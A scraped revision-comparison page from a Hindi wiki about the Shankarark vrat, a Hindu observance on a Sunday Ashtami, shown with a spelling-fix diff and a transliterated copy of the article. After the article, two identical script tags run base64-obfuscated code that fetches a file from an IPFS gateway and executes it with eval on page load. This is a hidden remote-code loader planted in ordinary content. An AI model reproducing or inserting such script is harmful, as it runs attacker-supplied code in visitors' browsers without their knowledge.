Difference between revisions of "शंकरार्क व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " {{लेख प्रगति |आधार=आधार1 |प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}" to "")
m (Text replace - "उल्लखित" to "उल्लिखित")
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[रविवार]] को पड़ने वाली [[अष्टमी]] पर शंकरार्कव्रत किया जाता है।
 
*[[रविवार]] को पड़ने वाली [[अष्टमी]] पर शंकरार्कव्रत किया जाता है।
 
*[[शंकर]] की दाहिनी [[आँख]] में स्थित [[सूर्य देव|सूर्य]] की पूजा की जाती है।
 
*[[शंकर]] की दाहिनी [[आँख]] में स्थित [[सूर्य देव|सूर्य]] की पूजा की जाती है।

Revision as of 18:46, 25 February 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • ravivar ko p dane vali ashtami par shankararkavrat kiya jata hai.
  • shankar ki dahini aankh mean sthit soory ki pooja ki jati hai.
  • ardh chandr ki akriti mean kuankum evan lal chandan se ek vritt banakar usamean svarn se j dit ek manik rakhana, jise shankar ki aankh kaha jaega
  • tithivrat; devata shankar ki aankh ke roop mean ark (soory) ki pooja ki jati hai.
  • yadi manik n ho to sona hi paryapt hona chahie.

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>